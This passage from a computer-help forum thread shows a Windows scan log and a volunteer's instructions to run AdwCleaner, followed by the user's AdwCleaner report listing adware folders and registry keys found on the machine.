2014-10-26 19:47 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-26 19:47 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-26 19:45 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-26 19:45 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-26 19:43 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-26 19:43 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-26 19:43 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-26 19:43 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-26 19:43 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-26 19:43 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-26 19:43 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-26 19:43 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-26 19:43 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-26 19:43 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-26 19:42 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-26 19:42 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-26 14:15 - 2014-10-26 14:15 - 00000000 ____D () C:\Users\MoM\AppData\Local\{F78AF8B4-B0A6-45F5-A424-303303B4E154}
2014-10-20 17:01 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-18 20:04 - 2014-10-18 20:04 - 00000000 ____D () C:\Users\MoM\AppData\Local\{5DB21507-2E68-481A-9EEF-DD2C05800DB9}
2014-10-12 17:50 - 2014-10-12 17:50 - 00000000 ____D () C:\Users\MoM\Documents\My Curse
2014-10-10 17:23 - 2014-10-10 17:23 - 00000000 ____D () C:\Users\MoM\AppData\Local\{E5D4237F-BC65-4853-BAD4-9368AD6F083F}
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-08 00:42 - 2013-04-13 17:33 - 00000000 ___RD () C:\Users\MoM\Google Drive
2014-11-08 00:41 - 2012-09-23 12:48 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-08 00:41 - 2012-09-22 20:14 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\Skype
2014-11-08 00:41 - 2012-05-11 22:26 - 00000000 ____D () C:\ProgramData\PDFC
2014-11-08 00:40 - 2010-11-20 22:47 - 02475954 _____ () C:\Windows\PFRO.log
2014-11-08 00:40 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-08 00:40 - 2009-07-13 23:51 - 00099814 _____ () C:\Windows\setupact.log
2014-11-08 00:39 - 2012-05-11 22:03 - 01105553 _____ () C:\Windows\WindowsUpdate.log
2014-11-08 00:30 - 2013-05-10 20:25 - 00000920 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000UA.job
2014-11-08 00:21 - 2012-10-01 20:51 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-08 00:06 - 2012-09-23 12:48 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-07 23:57 - 2013-10-04 21:57 - 00000284 _____ () C:\Windows\Tasks\DigitalSite.job
2014-11-07 22:18 - 2012-09-22 20:12 - 00003910 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{79ECE3BD-C8A8-4F1B-9772-7865629DE2A9}
2014-11-07 21:30 - 2013-05-10 20:25 - 00000898 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000Core.job
2014-11-07 19:57 - 2013-10-04 22:57 - 00000100 _____ () C:\Users\MoM\AppData\Roaming\WB.CFG
2014-11-07 19:17 - 2009-07-13 23:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-07 19:17 - 2009-07-13 23:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 20:39 - 2014-09-13 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Strife
2014-11-06 20:39 - 2012-05-11 22:27 - 00065157 _____ () C:\Windows\DirectX.log
2014-11-06 17:51 - 2013-12-08 08:44 - 00000000 ____D () C:\ProgramData\Oracle
2014-11-06 17:51 - 2012-09-23 08:11 - 00000000 ____D () C:\Program Files (x86)\Java
2014-11-06 17:49 - 2013-12-26 13:28 - 00000000 ____D () C:\Users\MoM\AppData\Local\NPE
2014-11-06 17:42 - 2014-07-23 22:24 - 00000000 ____D () C:\NPE
2014-11-05 20:01 - 2013-11-30 01:03 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\TS3Client
2014-11-05 19:02 - 2014-03-24 17:35 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\.minecraft
2014-11-05 19:01 - 2014-04-08 21:07 - 01195520 ___SH () C:\Users\MoM\Downloads\Thumbs.db
2014-11-04 17:41 - 2012-09-23 09:44 - 00000000 ____D () C:\Users\MoM\AppData\Local\CrashDumps
2014-11-04 17:20 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 17:11 - 2012-11-14 21:13 - 00000432 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-11-03 19:29 - 2012-12-10 15:45 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-11-03 19:29 - 2012-09-24 15:15 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-11-03 18:10 - 2013-04-13 17:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-11-02 14:36 - 2014-09-19 06:28 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-11-02 14:36 - 2012-09-22 20:14 - 00000000 ____D () C:\ProgramData\Skype
2014-11-01 12:01 - 2012-10-11 22:49 - 00000000 ____D () C:\Windows\Minidump
2014-11-01 12:00 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-50903-01.dmp
2014-11-01 00:08 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-47861-01.dmp
2014-10-31 23:09 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\110114-51417-01.dmp
2014-10-31 12:38 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103114-46254-01.dmp
2014-10-30 22:23 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103014-53648-01.dmp
2014-10-30 20:14 - 2012-05-11 23:09 - 00336446 ____N () C:\Windows\Minidump\103014-52587-01.dmp
2014-10-27 18:32 - 2012-09-30 08:25 - 00003214 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForMOM-HP$
2014-10-27 18:32 - 2012-09-30 08:25 - 00000338 _____ () C:\Windows\Tasks\HPCeeScheduleForMOM-HP$.job
2014-10-27 17:57 - 2012-09-23 07:53 - 00000000 ____D () C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2014-10-27 17:57 - 2012-05-11 22:30 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 17:55 - 2012-09-23 08:01 - 00003206 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-27 17:55 - 2012-09-23 08:01 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared
2014-10-27 17:51 - 2012-09-23 07:53 - 00000000 ____D () C:\Users\Public\Downloads\Norton
2014-10-27 16:06 - 2009-07-13 23:45 - 00355528 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-27 16:04 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-27 15:35 - 2012-09-23 09:38 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-27 15:05 - 2013-08-14 20:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-27 15:01 - 2012-09-23 12:49 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-27 15:01 - 2012-09-23 12:48 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-27 05:38 - 2013-01-24 18:23 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-26 21:11 - 2012-09-23 08:06 - 00000000 ____D () C:\Users\MoM
2014-10-26 21:09 - 2014-09-17 16:59 - 00000000 ____D () C:\Users\MoM\Downloads\Pokemon Red 2.5
2014-10-26 21:09 - 2014-04-27 13:52 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 21:09 - 2014-03-14 19:52 - 00000000 ____D () C:\Users\MoM\Downloads\Tardis Download
2014-10-26 21:09 - 2013-03-05 16:13 - 00000000 ____D () C:\Users\MoM\Downloads\csa folder
2014-10-26 21:09 - 2012-05-11 22:13 - 00000000 ____D () C:\ProgramData\RoxioNow
2014-10-26 21:09 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration
2014-10-26 19:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-26 19:29 - 2014-06-09 14:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:29 - 2014-06-09 14:23 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 19:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat
2014-10-26 19:29 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-10-26 19:27 - 2012-09-23 08:00 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-26 19:23 - 2012-05-11 22:18 - 00000000 ____D () C:\ProgramData\Symantec
2014-10-26 19:22 - 2012-09-23 09:38 - 00000000 __RHD () C:\MSOCache
2014-10-26 18:51 - 2012-09-23 08:01 - 00000000 ____D () C:\Program Files\Symantec
2014-10-20 16:44 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Msdtc
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-20 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-20 16:43 - 2014-09-17 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TI Tools
2014-10-20 16:43 - 2014-07-18 18:46 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-20 16:43 - 2013-06-10 15:39 - 00000000 ____D () C:\ProgramData\NexonUS
2014-10-20 16:30 - 2014-09-17 17:20 - 00000000 ____D () C:\Program Files (x86)\TI Education
2014-10-20 16:30 - 2012-09-23 12:48 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-18 19:04 - 2012-09-22 20:11 - 00090096 _____ () C:\Users\MoM\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-18 18:40 - 2013-03-23 21:18 - 00000000 ____D () C:\Users\MoM\AppData\Local\Halfbrick
2014-10-09 14:37 - 2009-07-14 00:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-10-15 23:01
==================== End Of Log ============================
#6
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 08 November 2014 - 02:38 AM
Hi,
Please download AdwCleaner by Xplode and save to your Desktop.
Please download AdwCleaner by Xplode and save to your Desktop.
- Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and select Run As Administrator - Click on the Scan button.
- AdwCleaner will begin...be patient as the scan may take some time to complete.
- After the scan has finished, click on the Report button...a logfile (AdwCleaner[R#].txt) will open in Notepad for review (where the largest value of # represents the most recent report).
- The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
- Copy and paste the contents of that logfile in your next reply.
- A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
#7
Conor Detwiller
-
- Authentic Member
-
- 6 posts
New Member
Posted 08 November 2014 - 11:10 AM
# AdwCleaner v4.100 - Report created 08/11/2014 at 12:03:46
# Updated 08/11/2014 by Xplode
# Database : 2014-11-07.1
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : MoM - MOM-HP
# Running from : C:\Users\MoM\Desktop\AdwCleaner.exe
# Option : Scan
***** [ Services ] *****
***** [ Files / Folders ] *****
File Found : C:\END
File Found : C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_igdhbblpcellaljokkpfhcjlagemhgjl_0.localstorage
Folder Found : C:\ProgramData\Ask
Folder Found : C:\ProgramData\Babylon
Folder Found : C:\Users\MoM\AppData\Local\apn
Folder Found : C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aoejbmmillcdifgagjpdlaamnalbielp
Folder Found : C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Folder Found : C:\Users\MoM\AppData\Local\Strongvault
Folder Found : C:\Users\MoM\AppData\LocalLow\Conduit
Folder Found : C:\Users\MoM\AppData\LocalLow\PriceGong
Folder Found : C:\Users\MoM\AppData\Roaming\digitalsite
Folder Found : C:\Users\MoM\AppData\Roaming\DigitalSites
Folder Found : C:\Users\MoM\AppData\Roaming\UpdaterEX
***** [ Scheduled Tasks ] *****
Task Found : DigitalSite
***** [ Shortcuts ] *****
***** [ Registry ] *****
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\AppDataLow\Software\PriceGong
Key Found : HKCU\Software\DataMngr
Key Found : HKCU\Software\DataMngr_Toolbar
Key Found : HKCU\Software\dsiteproducts
Key Found : HKCU\Software\Google\Chrome\Extensions\aoejbmmillcdifgagjpdlaamnalbielp
Key Found : HKCU\Software\Iminent
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\MICROSOFT\INTERNET EXPLORER\DOMSTORAGE\superfish.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.superfish.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\00D0686072044826B4B861174FBD522F
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DigitalSite
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdaterEX
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Zip Extractor Packages
Key Found : HKCU\Software\PIP
Key Found : HKCU\Software\Smartbar
Key Found : HKCU\Software\SmartBar
Key Found : HKCU\Software\UpdaterEX
Key Found : HKCU\Software\WEDLMNGR
Key Found : [x64] HKCU\Software\APN PIP
Key Found : [x64] HKCU\Software\DataMngr
Key Found : [x64] HKCU\Software\DataMngr_Toolbar
Key Found : [x64] HKCU\Software\dsiteproducts
Key Found : [x64] HKCU\Software\Iminent
Key Found : [x64] HKCU\Software\InstallCore
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\00D0686072044826B4B861174FBD522F
Key Found : [x64] HKCU\Software\PIP
Key Found : [x64] HKCU\Software\Smartbar
Key Found : [x64] HKCU\Software\SmartBar
Key Found : [x64] HKCU\Software\UpdaterEX
Key Found : [x64] HKCU\Software\WEDLMNGR
Key Found : HKLM\SOFTWARE\5a558addbc38bf15
Key Found : HKLM\SOFTWARE\Classes\AppID\{4277F7CF-0000-46CF-BA49-D624465C4BAB}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02054E11-5113-4BE3-8153-AA8DFB5D3761}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A85A5E6A-DE2C-4F4E-99DC-F469DF5A0EEC}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Found : HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}
Key Found : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}
Key Found : HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}
Key Found : HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}
Key Found : HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}
Key Found : HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}
Key Found : HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}
Key Found : HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}
Key Found : HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}
Key Found : HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}
Key Found : HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}
Key Found : HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}
Key Found : HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}
Key Found : HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}
Key Found : HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}
Key Found : HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}
Key Found : HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}
Key Found : HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}
Key Found : HKLM\SOFTWARE\Classes\Prod.cap
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT3298572
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{2BF2028E-3F3C-4C05-AB45-B2F1DCFE0759}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{DB538320-D3C5-433C-BCA9-C4081A054FCF}
Key Found : HKLM\SOFTWARE\DataMngr
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\aoejbmmillcdifgagjpdlaamnalbielp
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Found : HKLM\SOFTWARE\Iminent
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68B81CCD-A80C-4060-8947-5AE69ED01199}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E6B969FB-6D33-48D2-9061-8BBD4899EB08}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows5.0.0.0
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchTheWebARP
Key Found : HKLM\SOFTWARE\PIP
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3860D897-7DCD-473C-9744-B21DB133AB20}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4B62762D-AA67-4312-A5BF-91BCB7A4720A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{506DD7C6-B05D-43CE-81FF-AA05E11DBDFD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}
